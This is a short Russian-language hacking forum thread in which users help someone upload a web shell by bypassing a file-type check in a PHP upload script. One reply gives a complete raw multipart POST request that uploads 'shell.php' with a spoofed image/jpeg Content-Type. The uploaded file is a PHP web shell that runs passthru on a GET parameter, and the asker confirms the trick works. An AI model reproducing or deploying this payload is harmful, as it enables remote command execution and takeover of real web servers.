Помогите залить шелл

Помогите залить шелл (обойти $Filetype)

не актуально

 

Эм... Послать POST-запрос, но в передаваемых данных указать image/gif.

 

можешь небольшой пример привести?

 

То что ты дал - это не рабочий скрипт.Если быть точнее,он рабочий,если он куда то инклудиться,где и обозначаються фигурируемые там переменные.Если же нет,то если на сервере register_globals = on, то просто задай переменным нужное значение,и золей шелл таким образом.Но мне чтото подсказывает,что это только часть кода.

 

Хоть это и часть кода, он прекрасно заливает файлы (register_globals - ON, включены).
Если добавить

в запросе к нему. Но вот именно обойти тип файла для заливки не могу. Попробуйте у себя его запустить

 

Если расширение не проверяется, то можно заюзать что-нибудь типа такого запроса

Code:

POST http://127.0.0.1/upload/ HTTP/1.1
Host: localhost
Referer: http://127.0.0.1/index.php
Cookie: PHPSESSID=$session_id
Content-Length: 1024
Content-Type: multipart/form-data; boundary="6G+f"

--6G+f
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
--6G+f
Content-Disposition: form-data; name="uploaded"; filename="shell.php"
[b]Content-Type: image/jpeg[/b]

<?php
  if (isset ($_GET['id']) && !empty ($_GET['id']))
    passthru ($_GET['id']);
  else
    echo "Empty";
?>
--6G+f
Content-Disposition: form-data; name="Upload"

Upload
--6G+f--

 

Йухуу, есть такое дело
Спасибо, krypt3r